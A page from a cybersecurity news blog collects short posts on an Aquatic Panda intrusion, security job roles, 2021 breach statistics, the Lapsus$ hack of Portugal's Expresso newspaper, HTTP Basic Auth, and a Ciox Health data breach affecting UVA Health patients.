Aquatic Panda’s malicious behaviour went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

After the organization was alerted to the incident, the entity was able to quickly implement its incident response protocol. Which involved patching the vulnerable application and preventing further threat actor activity on the host.

In light of the attack’s successful disruption, the exact intent remains unknown.

source

What is Endpoint Security?

Endpoint security is the practice of securing endpoints or entry points of end-user devices such as desktops, laptops, and mobile devices from being exploited by malicious actors and campaigns. Endpoint security systems protect these endpoints on a network or in the cloud from cybersecurity threats. Endpoint security has evolved from traditional antivirus software to providing comprehensive protection from sophisticated malware and evolving zero-day threats.

Bookmark
Please login to bookmarkClose

What do security professionals actually do?

By
Steven Black (n0tst3)
-
0
Cybersecurity
Cybersecurity

What do security professionals actually do?

Whether you’re a new analyst looking to get into the IT security field, or a senior executive looking to understand more about security responsibilities, a common question is this: What do security professionals actually do?

A fully-loaded question

Understanding the roles of security professionals can either be overly simple or intensively complex, depending upon the depth of your investigation. In particular, while security responsibility “generalization” has been expanding to roles outside of ‘pure security’ (i.e. application development, etc.), specialization still occurs and is critical for organizations to be successful.

However, there are various areas that are important for organizations to utilize. Some of these roles could be in architecture and operations (setting up the security posture and maintaining it). Other roles could be in threat hunting or risk management.

How to make sense of it all

Rafeeq Rehman, an Information Security and Cloud Security specialist, has been publishing the CISO MindMap for a number of years. It is designed “…as an effective educational tool but also enables professionals to use this MindMap for designing and refining their security programs“. In a way, it provides a very high level, yet deep, view into the different roles and responsibilities of various security personnel. Rafeeq Rehman has graciously posted the PDF version of this image here.

source: rafeeqrehman.com!

Weekly cybersecurity newsletter

Real InfoSecurity CyberSecurity Newsletter

Click Here

Bookmark
Please login to bookmarkClose

Cybersecurity Statistics to know for 2022

By
Steven Black (n0tst3)
-
1
cybersecurity statistics
cybersecurity statistics

As we ride the wave and approachthe first working week, let’s take a look at some statistics that will help you stay up-to-date on recent cybersecurity trends

Without argument, 2021 was quite the roller-coaster. Nevertheless, we’ve entered a more hopeful new year, we have come up with a list of impactful cybersecurity statistics that should help you stay at the top of your security and privacy game over the next 12 months.

Drumroll.. Please.

CyberSecurity Statistics

  • 2021 saw the highest average cost of a data breach in 17 years. The cost rose from US$3.86 million to US$4.24 million on an annual basis.
  • The COVID-19-powered shift to remote work had a direct impact on the costs of data breaches. The average cost of a data breach was US$1.07 million higher where remote work was a factor in causing the breach.
  • The most common cause of data breaches was pilfered user credentials. As a commonly used attack vector, these were responsible for 20% of breaches, with these breaches causing the average cost of US$4.37 million. 
  • Midway through 2021, IT management software provider Kaseya had its systems compromised by the Sodinokibi ransomware, with the perpetrators asking for a US$70 million ransom – this was the largest ransomware fee demanded yet.
  • Social engineering attacks are the gravest threat to public administration, accounting for 69% of all public administration breaches analyzed by Verizon in 2021. 
  • Shortly after Log4Shell, the critical vulnerability in the Log4j logging utility, was disclosed in December 2021, ESET detected and blocked hundreds of thousands of exploitation attempts, with most of them located in the United States and the United Kingdom.
  • 2021 saw an incredible increase in the detection of Android banking malware. In T1 it rose by an incredible 158.7%, and T2 saw a continued growth of 49%. This should be considered a worrying trend since banking trojans have a direct impact on the financials of their targets. 
  • Four years on, WannaCryptor (also known as WannaCry) is still a global threat to be reckoned with. In T2, the infamous trojan that compromises machines vulnerable to the EternalBlue exploit topped the top ESET’s ransomware detections charts accounting for 21.3% of detections. 
  • Cryptocurrency investment scams remain as popular as ever. Between October 2020 and May 2021, victims were scammed out of more than US$80 million. The actual number is expected to be higher, since many people are ashamed to admit they have been duped. 
  • Cryptocurrency has been the preferred payment method for cybercriminals for a while now, especially when it comes to ransomware. As much as US$5.2 billion worth of outgoing Bitcoin transactions may be tied to ransomware payouts involving the top 10 most common ransomware variants. 
  • Early in 2021, the infamous Emotet botnet, one of the longest-lived and most pervasive malware threats, was disrupted in a large-scale global law enforcement operation. Some 700 command-and-control servers were taken offline during the bust (Europol)
  • The Cybersecurity Workforce Estimate, which assesses the number of available cybersecurity professionals worldwide, estimated the pool of specialists in 2021 to be some 4.2 million. That is an increase of 700,000 compared to the previous year. 
  • The same study also concluded that for the second year running the cybersecurity workforce gap has decreased. In 2020 the number of additional cybersecurity specialists needed by organizations to defend their assets was 3.12 million. That number shrank to 2.72 million in 2021.
  • To make up the shortfall of cybersecurity professionals needed to effectively defend the critical assets of organizations, the global cybersecurity workforce would have to grow by around 65%
  • 82% of organizations have admitted to increasing their cybersecurity budgets over the past year, with these funds accounting for up to 15% of total IT spending.
  • Recent years have seen threat actors move from just infesting systems with ransomware to double extortion where they also threaten to exfiltrate the data and release it to the public or sell it. Threats to leak the pilfered data have seen a sharp increase, going from 8.7% in 2020 to a whopping 81% in the second quarter of 2021.
  • There has been a significant increase in the overall costs of remedying a ransomware attack. In 2020 the cost was US$761,106, in 2021 the overall cost of remediating a ransomware attack skyrocketed to US$1.85 million.
  • The number of distributed denial-of-service (DDoS) attacks has also been on the upward trend, in part due to the COVID-19 pandemic. 2020 saw more than 10 million attacks occur, 1.6 million attacks more than the previous year.
  • In 2020, the Federal Bureau of Investigation’s (FBI) Internet Crime Center (IC3) received a record-breaking 791,790 cybercrime complaints, with reported losses being responsible for some US$4.2 billion in losses. 
  • Business Email Compromise (BEC) scams remain the costliest cybercrime, with losses surpassing US$1.86 billion in 2020, according to the FBI’s latest available data. In comparison, the second-costliest scam – confidence/romance fraud – registered losses of “only” some US$600 million. (2020 Internet Crime Report)
  • The elderly were disproportionally affected by cybercrime, as some 28% of total fraud losses were sustained by victims aged over 60. This accounts for approximately US$1 billion in losses to elderly victims. (IC3 2020 Elder Fraud Report)

source

Bookmark
Please login to bookmarkClose

Portuguese newspaper hacked by group that attacked Ministry of Health

By
Steven Black (n0tst3)
-
0
Portuguese newspaper hacked
Portuguese newspaper hacked

Portuguese newspaper Expresso hacked by attackers at dawn this Sunday, 2nd January 2022.

Those responsible for the invasion are the Lapsus Group, the same team that shut down the Ministry of Health’s systems last December.

The newspaper’s website displays a page similar to the one shown in the attack on the Brazilian government agency. hackers announced that they will leak data if they do not receive a value, and said they have control of the portal’s hosting system.

In addition to the website, hackers from the Lapsus Group hacked the newspaper Expresso’s Twitter profile.

“Lapsus$ is officially the new president of Portugal”

Expresso’s Twitter profile

Social networks in the newspaper such as Instagram and Facebook, are unaffected.

About the newspaper hack

Group that invaded newspaper Expresso also attacked Ministry of Health in December 2021

Last December, the Ministry of Health of Brazil was the subject of an attack by the same attackers. A number of their systems were rendered unavailable at the time.

Lapsus Group claims to have stolen documents from operator Claro

The Lapsus Group also claims authorship of an attack against operator Claro, in the last week of last year. The company’s services, such as customer service channels, recharge of prepaid telephones and in-store systems, were offline between the 27th and 29th of December.

Procon-SP even notified the operator about the failure. The company may be fined up to R$ 11 million. Claro says that the problem was due to “a systemic instability”, and denies that there was an invasion.

Hackers, in turn, published screenshots of the operator’s internal systems, and claim to have had access to 10,000 TB of data. The website Techblog, specializing in technology news, obtained confirmation from Claro employees that the images are legitimate, and that the company had indeed suffered the virtual invasion.

source

Bookmark
Please login to bookmarkClose

Using HTTP Basic Auth in 2022

By
Steven Black (n0tst3)
-
0
using http auth
using http auth

I create a lot of little side projects and experiments. Sometimes I have an idea that would work best behind a login.

Building an entire login system from scratch can be a significant investment and creates a major barrier to entry. It’s prevented me from building useful tools because they would require a login.

But in 2022 I won’t let that stop me.

More than ten years ago I created a little experimental tool at work. We had a database of users but we didn’t have any type of API for our login system. If I built something that wasn’t part of the monolith, it wouldn’t integrate with the system. I decided to try HTTP Basic Auth. It worked, and that little experiment slowly expanded to dozens of other tools and became a major internal admin system. I’m not involved on the teams that use those tools anymore but my little auth module is still being used because Basic Auth has been good enough.

There are some very minor downsides, but if a project does well enough, I can always build a better login system later.

It would probably be strait-forward to implement a third party login flow, such as Google, Apple, or Facebook accounts. But, I have privacy and lock-in concerns with using these third-party systems.

What does HTTP Basic Authentication look like in 2022? Here’s a screenshot of the login prompt in the latest version of Google Chrome.

Chrome Basic Auth Screenshot

Some online resources mention that HTTP Basic Authentication is deprecated, but that’s a misunderstanding. Only passing username and password as part of the URL is deprecated. It’s still perfectly valid to pass the credentials in the HTTP header and that’s what I’ll be doing. This method works in every modern browser.

As an additional aside, modern browsers still support credentials in the URL, even though the practice is deprecated. To prevent certain fishing attacks, they hide those credentials from the user in various ways, but it tends to work anyway. I wouldn’t personally use credentials in the URL though; who knows how long browsers will continue to support that.

Because Basic Authentication sends the username and password with each HTTP request, it’s insecure unless the credentials are served over an encrypted HTTPS connection. These days HTTPS is the norm for many of our projects, but it’s something you need to be aware of. You don’t want to use this over a regular HTTP connection because anyone on the same network can see the unencrypted values. Because HTTPS requests are encrypted, this isn’t a problem over HTTPS.

I’ve created a template for a simple application that implements HTTP Basic Authentication in Go.

source

Bookmark
Please login to bookmarkClose

UVA Health notified patients after Ciox Health data breach

By
Steven Black (n0tst3)
-
0
UVA health
UVAhealth

Someone on Twitter asked me what the first breach of 2022 would be. The following public notice is not the first breach of 2022. It is a 2021 breach that just showed up after midnight in my news search this morning. And because it involves a third-party breach, we may see other covered entities affected, too. DataBreaches.net has reached out to Ciox Health to ask for more details.  In the meantime, here is UVA’s public notice:

On December 3, 2021, UVA Health, including the UVA Medical Center in Charlottesville and UVA Culpeper Medical Center in Culpeper, learned from Ciox Health, a vendor of health information management services for UVA Health and many other health systems and providers nationwide, that an unauthorized person accessed a Ciox Health employee’s email account and may have been able to view health information of patients of several of Ciox’s health system and provider clients, including the information of 429 UVA Health patients (.01% of total UVA Health patient records). Ciox Health has informed UVA Health that the unauthorized access occurred between June 24 and July 2, 2021, and during that time an unauthorized individual may have downloaded emails and attachments in the account. Ciox Health began investigating this incident as soon as they detected it and promptly reported it to UVA Health. They have provided the following details regarding this incident:

What Happened? Ciox Health became aware of unusual activity on the email account of one of their employees and, after securing the account, launched an investigation with the assistance of an outside cybersecurity firm. Unfortunately, Ciox Health has indicated that their investigation was unable to determine whether any emails or attachments were actually viewed or acquired. The activity occurred solely within Ciox Health’s systems and did not in any way compromise the security of UVA Health’s electronic medical record or other systems.

What Information was Involved? Ciox Health reviewed the information contained in their employee’s account and determined that the information contained in the account included patient names, dates of birth, provider names and dates of service. Patients’ Social Security numbers and financial information were not viewable.

What Are Ciox and UVA Health Doing to Address this Issue? Ciox Health assures us that they are implementing additional procedures to further strengthen email security including best-practice multi-factor email authentication as well as enforcing annual compliance training specific to security awareness and identifying and avoiding suspicious emails. Because the data breach occurred within Ciox Health’s systems, UVA Health has no reason to believe that its systems or security have been compromised. UVA Health mailed letters to those patients on December 30, 2021 who Ciox Health was able to directly identify as potentially having been impacted by this issue. This publication is intended to make patients who might have been impacted but for whom we do not have sufficient information to contact them directly aware of this issue.

What Can UVA Health’s Patients Do? Ciox Health has indicated that it believes the account access occurred for purposes of sending phishing emails to individuals unrelated to Ciox Health and has no indication that patients’ information has been misused. However, as a precaution, UVA Health recommends that all patients continue to review statements they receive from their healthcare providers and health insurance provider and to contact their provider or insurer immediately if there are charges for services they did not receive. And as always, it is important to observe email best practices by being aware and not clicking on links or attachments in emails from senders you do not recognize. If you have any questions or need additional information, Ciox Health will provide a dedicated call center for affected patients. Patients with questions or who need more information can call 855.618.3107 between 9 a.m. – 6:30 p.m. Eastern Time, Monday through Friday. UVA Health and Ciox Health apologize for this incident and regret any inconvenience or concern this causes our patients.

source

Bookmark
Please login to bookmarkClose
1...636465...79Page 64 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.